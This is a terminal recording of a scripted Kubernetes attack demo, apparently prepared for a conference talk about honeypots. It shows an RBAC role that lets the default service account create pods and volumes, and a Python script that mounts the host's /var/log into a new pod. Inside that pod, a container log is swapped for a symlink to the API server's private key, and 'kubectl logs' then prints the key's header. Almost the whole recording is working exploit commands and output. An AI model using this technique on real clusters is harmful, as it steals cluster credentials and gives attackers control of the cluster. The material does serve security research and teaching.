{"version": 2, "width": 129, "height": 30, "timestamp": 1709657161, "env": {"SHELL": "/bin/bash", "TERM": "xterm-256color"}}
[0.314552, "o", "\u001b[?2004h\u001b]0;james@james-thinkpad: ~/Documents/talks/kceu24/honeypot-demo\u0007\u001b[01;32mjames@james-thinkpad\u001b[00m:\u001b[01;34m~/Documents/talks/kceu24/honeypot-demo\u001b[00m$ "]
[1.758026, "o", "."]
[1.900905, "o", "/"]
[2.510527, "o", "a"]
[2.702453, "o", "t"]
[2.822358, "o", "tack-demo.sh "]
[3.559064, "o", "\r\n\u001b[?2004l\r"]
[3.580169, "o", "\u001b[H\u001b[2J\u001b[3J"]
[3.589203, "o", "$ "]
[4.169865, "o", "\u001b["]
[4.350481, "o", "1m"]
[4.440697, "o", "ku"]
[4.531293, "o", "be"]
[4.621674, "o", "ctl"]
[4.711935, "o", " g"]
[4.802035, "o", "et"]
[4.892626, "o", " p"]
[4.982561, "o", "o\u001b"]
[5.073182, "o", "[0m"]
[6.173871, "o", "\r\n"]
[6.248178, "o", "NAME        READY   STATUS    RESTARTS   AGE\r\nssh-proxy   1/1     Running"]
[6.248409, "o", "   0          5h8m\r\n"]
[6.256371, "o", "$ "]
[7.60457, "o", "\u001b["]
[7.785328, "o", "1m"]
[7.875396, "o", "ku"]
[7.96555, "o", "be"]
[8.05603, "o", "ct"]
[8.146414, "o", "l "]
[8.236687, "o", "po"]
[8.327229, "o", "rt"]
[8.417667, "o", "-f"]
[8.507624, "o", "or"]
[8.688316, "o", "war"]
[8.77859, "o", "d "]
[8.869094, "o", "sv"]
[8.959122, "o", "c/"]
[9.049641, "o", "ss"]
[9.140049, "o", "h-"]
[9.230304, "o", "pr"]
[9.320511, "o", "ox"]
[9.410599, "o", "y "]
[9.591074, "o", "55"]
[9.681499, "o", "55:"]
[9.771831, "o", "22"]
[9.861979, "o", " &"]
[9.952485, "o", "\u001b["]
[10.042787, "o", "0m"]
[10.845092, "o", "\r\n"]
[10.859223, "o", "$ "]
[10.941365, "o", "Forwarding from 127.0.0.1:5555 -> 22\r\nForwarding from [::1]:5555 -> 22\r\n"]
[12.628494, "o", "\u001b["]
[12.808799, "o", "1m"]
[12.89892, "o", "ca"]
[12.989383, "o", "t "]
[13.07993, "o", "sc"]
[13.170292, "o", "en"]
[13.26049, "o", "ar"]
[13.350934, "o", "io"]
[13.44131, "o", "/r"]
[13.531691, "o", "ba"]
[13.712137, "o", "c."]
[13.802583, "o", "ya"]
[13.892787, "o", "ml"]
[13.982778, "o", "\u001b["]
[14.073372, "o", "0m"]
[15.211745, "o", "\r\n"]
[15.220403, "o", "---\r\nkind: ClusterRole\r\napiVersion: rbac.authorization.k8s.io/v1\r\nmetadata:\r\n  name: pods-create\r\nrules:\r\n- apiGroups: [\"\"]\r\n  resources: [\"pods\", \"persistentvolumes\", \"persistentvolumeclaims\"]\r\n  verbs: [\"create\"]\r\n\r\n---\r\nkind: ClusterRoleBinding\r\napiVersion: rbac.authorization.k8s.io/v1\r\nmetadata:\r\n  name: pods-create\r\nsubjects:\r\n- kind: ServiceAccount\r\n  name: default\r\n  namespace: default\r\nroleRef:\r\n  kind: ClusterRole\r\n  name: pods-create\r\n  apiGroup: rbac.authorization.k8s.io"]
[16.470597, "o", "\u001b[H\u001b[2J\u001b[3J"]
[16.478106, "o", "$ "]
[17.037651, "o", "\u001b"]
[17.218187, "o", "[1"]
[17.308742, "o", "mc"]
[17.399105, "o", "at"]
[17.489218, "o", " "]
[17.579845, "o", "sc"]
[17.670262, "o", "ri"]
[17.760677, "o", "pt"]
[17.850794, "o", "s/"]
[17.941096, "o", "c"]
[18.121984, "o", "re"]
[18.212152, "o", "at"]
[18.302475, "o", "e."]
[18.392917, "o", "py"]
[18.483124, "o", "\u001b"]
[18.573242, "o", "[0"]
[18.66374, "o", "m"]
[19.92727, "o", "\r\n"]
[19.9364, "o", "from kubernetes import client, config\r\n\r\nconfig.load_incluster_config()\r\n\r\nv1 = client.CoreV1Api()\r\npv_metadata = client.V1ObjectMeta(name='my-volume-vol', labels={'type': 'local'})\r\npvc_metadata = client.V1ObjectMeta(name='my-claim-vol')\r\npod_metadata = client.V1ObjectMeta(name='my-pod')\r\nhpvs = client.V1HostPathVolumeSource(path='/var/log')\r\npv_spec = client.V1PersistentVolumeSpec(storage_class_name='local-storage', capacity={'storage': '10Gi'}, access_modes=['ReadWriteOnce'], host_path=hpvs)\r\nvol_resource = client.V1VolumeResourceRequirements(requests={'storage': '3Gi'})\r\npvc_spec = client.V1PersistentVolumeClaimSpec(storage_class_name='local-storage', access_modes=['ReadWriteOnce'], resources=vol_resource)\r\npvcsrc=client.V1PersistentVolumeClaimVolumeSource(claim_name='my-claim-vol')\r\nvol1 = client.V1Volume(name='my-storage-vol', persistent_volume_claim=pvcsrc)\r\nvolmnt = client.V1VolumeMount(name='my-storage-vol', mount_path='/hostlogs')\r\ncontainer1 = client.V1Container(name='my-pod', image='ubuntu:latest'"]
[19.936606, "o", ", command=[\"sh\", \"-c\", \"sleep 1h\"], volume_mounts=[volmnt])\r\npod_spec = client.V1PodSpec(containers=[container1], volumes=[vol1])\r\npv_body = client.V1PersistentVolume(metadata=pv_metadata, spec=pv_spec)\r\npvc_body = client.V1PersistentVolumeClaim(metadata=pvc_metadata, spec=pvc_spec)\r\npod_body = client.V1Pod(metadata=pod_metadata, spec=pod_spec, kind='Pod', api_version='v1')\r\npv = v1.create_persistent_volume(body=pv_body)\r\npvc = v1.create_namespaced_persistent_volume_claim(namespace='default', body=pvc_body)\r\npod = v1.create_namespaced_pod(namespace='default', body=pod_body)"]
[33.543638, "o", "\u001b[H\u001b[2J\u001b[3J"]
[33.547882, "o", "$ "]
[33.987063, "o", "\u001b["]
[34.167592, "o", "1m"]
[34.258078, "o", "sc"]
[34.348437, "o", "p "]
[34.438781, "o", "-P"]
[34.529222, "o", " 5"]
[34.619543, "o", "55"]
[34.709807, "o", "5 "]
[34.800349, "o", "sc"]
[34.890759, "o", "ri"]
[35.071247, "o", "pt"]
[35.161685, "o", "s/"]
[35.252033, "o", "cr"]
[35.342399, "o", "ea"]
[35.432783, "o", "te"]
[35.523139, "o", ".p"]
[35.613454, "o", "y "]
[35.703638, "o", "sc"]
[35.793882, "o", "ri"]
[35.97431, "o", "pt"]
[36.064644, "o", "s/"]
[36.154968, "o", "pr"]
[36.24509, "o", "iv"]
[36.335526, "o", "-c"]
[36.425799, "o", "re"]
[36.515811, "o", "at"]
[36.606364, "o", "e."]
[36.696742, "o", "sh"]
[36.876901, "o", " r"]
[36.967212, "o", "oo"]
[37.057639, "o", "t@"]
[37.148156, "o", "12"]
[37.238367, "o", "7."]
[37.328737, "o", "0."]
[37.418988, "o", "0."]
[37.509087, "o", "1:"]
[37.599411, "o", "/r"]
[37.689996, "o", "oo"]
[37.870562, "o", "t\u001b"]
[37.96068, "o", "[0"]
[38.051176, "o", "m"]
[38.694227, "o", "\r\n"]
[38.710431, "o", "Handling connection for 5555\r\n"]
[38.817876, "o", "\rroot@127.0.0.1's password: "]
[40.940816, "o", "\r\n"]
[41.089339, "o", "\rcreate.py                                                                                        0%    0     0.0KB/s   --:-- ETA"]
[41.094231, "o", "\rcreate.py                                                                                      100% 1582   312.2KB/s   00:00    \r\n"]
[41.098079, "o", "\rpriv-create.sh                                                                                   0%    0     0.0KB/s   --:-- ETA"]
[41.101554, "o", "\rpriv-create.sh                                                                                 100%  269    75.3KB/s   00:00    \r\n"]
[41.119377, "o", "$ "]
[42.539633, "o", "\u001b"]
[42.720429, "o", "[1"]
[42.810671, "o", "ms"]
[42.900945, "o", "sh"]
[42.991323, "o", " "]
[43.081852, "o", "-p"]
[43.172075, "o", " 5"]
[43.262394, "o", "55"]
[43.35274, "o", "5 "]
[43.442803, "o", "-"]
[43.623292, "o", "t "]
[43.713693, "o", "ro"]
[43.804036, "o", "ot"]
[43.894404, "o", "@1"]
[43.984549, "o", "2"]
[44.075058, "o", "7."]
[44.165329, "o", "0."]
[44.255749, "o", "0."]
[44.346063, "o", "1 "]
[44.526445, "o", " "]
[44.616656, "o", "'s"]
[44.707115, "o", "ou"]
[44.797226, "o", "rc"]
[44.887592, "o", "e "]
[44.977824, "o", "p"]
[45.067871, "o", "ri"]
[45.158408, "o", "v-"]
[45.248709, "o", "cr"]
[45.429106, "o", "ea"]
[45.519373, "o", "t"]
[45.609514, "o", "e."]
[45.699945, "o", "sh"]
[45.790208, "o", "' "]
[45.880449, "o", "&&"]
[45.970696, "o", " "]
[46.061027, "o", "ku"]
[46.151407, "o", "be"]
[46.241929, "o", "ct"]
[46.422318, "o", "l "]
[46.512656, "o", "w"]
[46.602885, "o", "ai"]
[46.693374, "o", "t "]
[46.783526, "o", "--"]
[46.873547, "o", "fo"]
[46.964036, "o", "r"]
[47.054269, "o", "=c"]
[47.144639, "o", "on"]
[47.325162, "o", "di"]
[47.41539, "o", "ti"]
[47.505734, "o", "o"]
[47.595671, "o", "n="]
[47.68578, "o", "Re"]
[47.776018, "o", "ad"]
[47.866185, "o", "y "]
[47.956416, "o", "p"]
[48.047024, "o", "od"]
[48.22735, "o", " m"]
[48.317863, "o", "y-"]
[48.408201, "o", "po"]
[48.498266, "o", "d"]
[48.588573, "o", "\u001b["]
[48.678802, "o", "0m"]
[49.340044, "o", "\r\n"]
[49.351218, "o", "Handling connection for 5555\r\n"]
[49.442671, "o", "\rroot@127.0.0.1's password: "]
[51.543499, "o", "\r\n"]
[51.728398, "o", "\u001b[33m\r0% [Working]\u001b[0m"]
[51.835075, "o", "\r            \rHit:1 http://archive.ubuntu.com/ubuntu jammy InRelease\r\n\u001b[33m\r0% [Connecting to security.ubuntu.com (91.189.91.81)]\u001b[0m"]
[51.850777, "o", "\r                                                     \rGet:2 http://archive.ubuntu.com/ubuntu jammy-updates InRelease [119 kB]\r\n\u001b[33m\r0% [2 InRelease 1120 B/119 kB 1%] [Connecting to security.ubuntu.com (91.189.91.81)]\u001b[0m"]
[51.913597, "o", "\u001b[33m\r                                                                                    \r0% [Waiting for headers]\u001b[0m"]
[51.926896, "o", "\r                        \rHit:3 http://archive.ubuntu.com/ubuntu jammy-backports InRelease\r\n\u001b[33m\r0% [Waiting for headers]\u001b[0m"]
[51.944556, "o", "\u001b[33m\r0% [Waiting for headers]\u001b[0m"]
[51.962066, "o", "\r                        \rGet:4 http://security.ubuntu.com/ubuntu jammy-security InRelease [110 kB]\r\n\u001b[33m\r0% [4 InRelease 1131 B/110 kB 1%]\u001b[0m"]
[52.02655, "o", "\u001b[33m\r0% [4 InRelease 14.1 kB/110 kB 13%]\u001b[0m"]
[52.103274, "o", "\u001b[33m\r0% [4 InRelease 42.9 kB/110 kB 39%]\u001b[0m"]
[52.216768, "o", "\u001b[33m\r                                   \r0% [Working]\u001b[0m"]
[52.299608, "o", "\u001b[33m\r100% [Working]\u001b[0m\r              \rFetched 229 kB in 1s (396 kB/s)\r\n"]
[52.303519, "o", "\rReading package lists... 0%\r"]
[52.352935, "o", "\rReading package lists... 0%\r"]
[52.358449, "o", "\rReading package lists... 0%\r"]
[52.381973, "o", "\rReading package lists... 5%\r\rReading package lists... 5%\r"]
[52.404662, "o", "\rReading package lists... 6%\r\rReading package lists... 6%\r"]
[52.707327, "o", "\rReading package lists... 61%\r\rReading package lists... 61%\r"]
[52.716019, "o", "\rReading package lists... 61%\r\rReading package lists... 61%\r"]
[52.754836, "o", "\rReading package lists... 68%\r\rReading package lists... 68%\r"]
[52.78695, "o", "\rReading package lists... 76%\r\rReading package lists... 76%\r"]
[52.81718, "o", "\rReading package lists... 81%\r\rReading package lists... 81%\r"]
[52.818531, "o", "\rReading package lists... 81%\r\rReading package lists... 81%\r"]
[52.81946, "o", "\rReading package lists... 81%\r\rReading package lists... 81%\r"]
[52.822941, "o", "\rReading package lists... 81%\r\rReading package lists... 81%\r"]
[52.838006, "o", "\rReading package lists... 87%\r\rReading package lists... 87%\r"]
[52.852842, "o", "\rReading package lists... 95%\r\rReading package lists... 95%\r"]
[52.863217, "o", "\rReading package lists... 99%\r\rReading package lists... 99%\r"]
[52.863545, "o", "\rReading package lists... 99%\r\rReading package lists... 99%\r"]
[52.869286, "o", "\rReading package lists... Done\r\r\n"]
[52.87986, "o", "\rBuilding dependency tree... 0%\r\rBuilding dependency tree... 0%\r\rBuilding dependency tree... 0%\r"]
[52.902153, "o", "\rBuilding dependency tree... 50%\r\rBuilding dependency tree... 50%\r"]
[53.004681, "o", "\rBuilding dependency tree... Done\r\r\n\rReading state information... 0% \r\rReading state information... 0%\r\rReading state information... Done\r\r\n"]
[53.013572, "o", "6 packages can be upgraded. Run 'apt list --upgradable' to see them.\r\n"]
[53.050744, "o", "\rReading package lists... 0%\r"]
[53.093004, "o", "\rReading package lists... 0%\r"]
[53.098586, "o", "\rReading package lists... 0%\r"]
[53.121509, "o", "\rReading package lists... 5%\r\rReading package lists... 5%\r"]
[53.14388, "o", "\rReading package lists... 6%\r\rReading package lists... 6%\r"]
[53.452153, "o", "\rReading package lists... 61%\r\rReading package lists... 61%\r"]
[53.46031, "o", "\rReading package lists... 61%\r\rReading package lists... 61%\r"]
[53.498725, "o", "\rReading package lists... 68%\r\rReading package lists... 68%\r"]
[53.531752, "o", "\rReading package lists... 76%\r\rReading package lists... 76%\r"]
[53.562085, "o", "\rReading package lists... 81%\r\rReading package lists... 81%\r"]
[53.563776, "o", "\rReading package lists... 81%\r\rReading package lists... 81%\r"]
[53.564779, "o", "\rReading package lists... 81%\r\rReading package lists... 81%\r"]
[53.568433, "o", "\rReading package lists... 81%\r\rReading package lists... 81%\r"]
[53.583427, "o", "\rReading package lists... 87%\r\rReading package lists... 87%\r"]
[53.598413, "o", "\rReading package lists... 95%\r\rReading package lists... 95%\r"]
[53.60877, "o", "\rReading package lists... 99%\r\rReading package lists... 99%\r"]
[53.60894, "o", "\rReading package lists... 99%\r\rReading package lists... 99%\r"]
[53.614896, "o", "\rReading package lists... Done\r\r\n"]
[53.6247, "o", "\rBuilding dependency tree... 0%\r\rBuilding dependency tree... 0%\r"]
[53.648148, "o", "\rBuilding dependency tree... 50%\r\rBuilding dependency tree... 50%\r"]
[53.748976, "o", "\rBuilding dependency tree... Done\r\r\n\rReading state information... 0% \r\rReading state information... 0%\r\rReading state information... Done\r\r\n"]
[53.75232, "o", "python3-pip is already the newest version (22.0.2+dfsg-1ubuntu0.4).\r\n"]
[53.873928, "o", "0 upgraded, 0 newly installed, 0 to remove and 6 not upgraded.\r\n"]
[54.152322, "o", "Requirement already satisfied: kubernetes in /usr/local/lib/python3.10/dist-packages (29.0.0)\r\n"]
[54.157999, "o", "Requirement already satisfied: websocket-client!=0.40.0,!=0.41.*,!=0.42.*,>=0.32.0 in /usr/local/lib/python3.10/dist-packages (from kubernetes) (1.7.0)\r\nRequirement already satisfied: python-dateutil>=2.5.3 in /usr/local/lib/python3.10/dist-packages (from kubernetes) (2.9.0.post0)\r\n"]
[54.158671, "o", "Requirement already satisfied: certifi>=14.05.14 in /usr/local/lib/python3.10/dist-packages (from kubernetes) (2024.2.2)\r\n"]
[54.158921, "o", "Requirement already satisfied: oauthlib>=3.2.2 in /usr/local/lib/python3.10/dist-packages (from kubernetes) (3.2.2)\r\n"]
[54.159001, "o", "Requirement already satisfied: requests-oauthlib in /usr/local/lib/python3.10/dist-packages (from kubernetes) (1.3.1)\r\n"]
[54.159496, "o", "Requirement already satisfied: google-auth>=1.0.1 in /usr/local/lib/python3.10/dist-packages (from kubernetes) (2.28.1)\r\n"]
[54.15959, "o", "Requirement already satisfied: requests in /usr/local/lib/python3.10/dist-packages (from kubernetes) (2.31.0)\r\n"]
[54.159974, "o", "Requirement already satisfied: pyyaml>=5.4.1 in /usr/local/lib/python3.10/dist-packages (from kubernetes) (6.0.1)\r\n"]
[54.160296, "o", "Requirement already satisfied: urllib3>=1.24.2 in /usr/local/lib/python3.10/dist-packages (from kubernetes) (2.2.1)\r\n"]
[54.160657, "o", "Requirement already satisfied: six>=1.9.0 in /usr/local/lib/python3.10/dist-packages (from kubernetes) (1.16.0)\r\n"]
[54.167572, "o", "Requirement already satisfied: cachetools<6.0,>=2.0.0 in /usr/local/lib/python3.10/dist-packages (from google-auth>=1.0.1->kubernetes) (5.3.3)\r\n"]
[54.167857, "o", "Requirement already satisfied: pyasn1-modules>=0.2.1 in /usr/local/lib/python3.10/dist-packages (from google-auth>=1.0.1->kubernetes) (0.3.0)\r\n"]
[54.16825, "o", "Requirement already satisfied: rsa<5,>=3.1.4 in /usr/local/lib/python3.10/dist-packages (from google-auth>=1.0.1->kubernetes) (4.9)\r\n"]
[54.183303, "o", "Requirement already satisfied: idna<4,>=2.5 in /usr/local/lib/python3.10/dist-packages (from requests->kubernetes) (3.6)\r\nRequirement already satisfied: charset-normalizer<4,>=2 in /usr/local/lib/python3.10/dist-packages (from requests->kubernetes) (3.3.2)\r\n"]
[54.189832, "o", "Requirement already satisfied: pyasn1<0.6.0,>=0.4.6 in /usr/local/lib/python3.10/dist-packages (from pyasn1-modules>=0.2.1->google-auth>=1.0.1->kubernetes) (0.5.1)\r\n"]
[54.196872, "o", "\u001b[33mWARNING: Running pip as the 'root' user can result in broken permissions and conflicting behaviour with the system package manager. It is recommended to use a virtual environment instead: https://pip.pypa.io/warnings/venv\u001b[0m\u001b[33m\r\n\u001b[0m"]
[54.546651, "o", "Connection to 127.0.0.1 closed.\r\r\n"]
[57.634831, "o", "pod/my-pod condition met\r\n"]
[57.642186, "o", "$ "]
[58.78253, "o", "\u001b"]
[58.963229, "o", "[1"]
[59.05357, "o", "mk"]
[59.143961, "o", "ub"]
[59.234207, "o", "e"]
[59.324407, "o", "ct"]
[59.414687, "o", "l "]
[59.505095, "o", "ge"]
[59.595444, "o", "t "]
[59.685849, "o", "p"]
[59.86611, "o", "o\u001b"]
[59.956486, "o", "[0"]
[60.046646, "o", "m"]
[60.856063, "o", "\r\n"]
[60.941644, "o", "NAME        READY   STATUS    "]
[60.941876, "o", "RESTARTS   AGE\r\nmy-pod      1/1     Running   0"]
[60.941981, "o", "          6s\r\nssh-proxy   1/1     Running   0          5h9m\r\n"]
[62.763454, "o", "\u001b[H\u001b[2J\u001b[3J"]
[62.770981, "o", "$ "]
[63.482892, "o", "\u001b"]
[63.663518, "o", "[1"]
[63.753844, "o", "mk"]
[63.844124, "o", "ub"]
[63.934661, "o", "e"]
[64.024809, "o", "ct"]
[64.114951, "o", "l "]
[64.20518, "o", "ex"]
[64.29537, "o", "ec"]
[64.385534, "o", " "]
[64.565877, "o", "-i"]
[64.655942, "o", "t "]
[64.746216, "o", "my"]
[64.836329, "o", "-p"]
[64.926638, "o", "o"]
[65.016763, "o", "d "]
[65.107005, "o", "--"]
[65.197305, "o", " /"]
[65.287535, "o", "bi"]
[65.468105, "o", "n"]
[65.558002, "o", "/b"]
[65.64859, "o", "as"]
[65.738912, "o", "h "]
[65.829142, "o", "-c"]
[65.91949, "o", " "]
[66.00973, "o", "\"c"]
[66.099943, "o", "d "]
[66.190275, "o", "/h"]
[66.370794, "o", "os"]
[66.461209, "o", "t"]
[66.551556, "o", "lo"]
[66.641929, "o", "gs"]
[66.732353, "o", "/p"]
[66.822594, "o", "od"]
[66.912729, "o", "s"]
[67.003195, "o", "/d"]
[67.093436, "o", "ef"]
[67.183716, "o", "au"]
[67.36439, "o", "lt"]
[67.454628, "o", "_"]
[67.544769, "o", "my"]
[67.635233, "o", "-p"]
[67.725955, "o", "od"]
[67.816221, "o", "_*"]
[67.906556, "o", "*"]
[67.996449, "o", "/m"]
[68.087116, "o", "y-"]
[68.26765, "o", "po"]
[68.357815, "o", "d/"]
[68.447791, "o", " "]
[68.53804, "o", "&&"]
[68.628606, "o", " r"]
[68.71919, "o", "m "]
[68.809352, "o", "0."]
[68.899434, "o", "l"]
[68.989525, "o", "og"]
[69.170299, "o", " &"]
[69.26033, "o", "& "]
[69.350717, "o", "ln"]
[69.440764, "o", " "]
[69.531314, "o", "-s"]
[69.62167, "o", " /"]
[69.711885, "o", "et"]
[69.802158, "o", "c/"]
[69.892554, "o", "k"]
[70.073032, "o", "ub"]
[70.163277, "o", "er"]
[70.253611, "o", "ne"]
[70.343932, "o", "te"]
[70.434241, "o", "s"]
[70.524582, "o", "/p"]
[70.614802, "o", "ki"]
[70.705258, "o", "/a"]
[70.795425, "o", "pi"]
[70.885666, "o", "s"]
[71.06628, "o", "er"]
[71.156757, "o", "ve"]
[71.246997, "o", "r."]
[71.337339, "o", "ke"]
[71.427572, "o", "y"]
[71.517932, "o", " 0"]
[71.60822, "o", ".l"]
[71.698547, "o", "og"]
[71.788868, "o", "\"\u001b"]
[71.96949, "o", "["]
[72.059818, "o", "0m"]
[73.267178, "o", "\r\n"]
[73.447724, "o", "$ "]
[74.716759, "o", "\u001b["]
[74.897314, "o", "1m"]
[74.987293, "o", "ku"]
[75.078041, "o", "be"]
[75.168276, "o", "ct"]
[75.258686, "o", "l "]
[75.349203, "o", "lo"]
[75.4396, "o", "gs"]
[75.529885, "o", " m"]
[75.620151, "o", "y-"]
[75.800855, "o", "pod"]
[75.890949, "o", "\u001b["]
[75.981142, "o", "0m"]
[77.020304, "o", "\r\n"]
[77.083484, "o", "failed to get parse function: unsupported log format: \"-----BEGIN RSA PRIVATE KEY-----\\n\""]
[77.088995, "o", "\u001b[?2004h\u001b]0;james@james-thinkpad: ~/Documents/talks/kceu24/honeypot-demo\u0007\u001b[01;32mjames@james-thinkpad\u001b[00m:\u001b[01;34m~/Documents/talks/kceu24/honeypot-demo\u001b[00m$ "]
[78.74583, "o", "\r\n\u001b[?2004l\r"]
[78.7461, "o", "\u001b[?2004h\u001b]0;james@james-thinkpad: ~/Documents/talks/kceu24/honeypot-demo\u0007\u001b[01;32mjames@james-thinkpad\u001b[00m:\u001b[01;34m~/Documents/talks/kceu24/honeypot-demo\u001b[00m$ "]
[80.265131, "o", "\r\n\u001b[?2004l\r"]
[80.265353, "o", "\u001b[?2004h\u001b]0;james@james-thinkpad: ~/Documents/talks/kceu24/honeypot-demo\u0007\u001b[01;32mjames@james-thinkpad\u001b[00m:\u001b[01;34m~/Documents/talks/kceu24/honeypot-demo\u001b[00m$ "]
[93.42827, "o", "e"]
[93.599906, "o", "x"]
[93.732066, "o", "i"]
[93.882061, "o", "t"]
[94.000077, "o", "\r\n\u001b[?2004l\r"]
[94.000239, "o", "exit\r\n"]
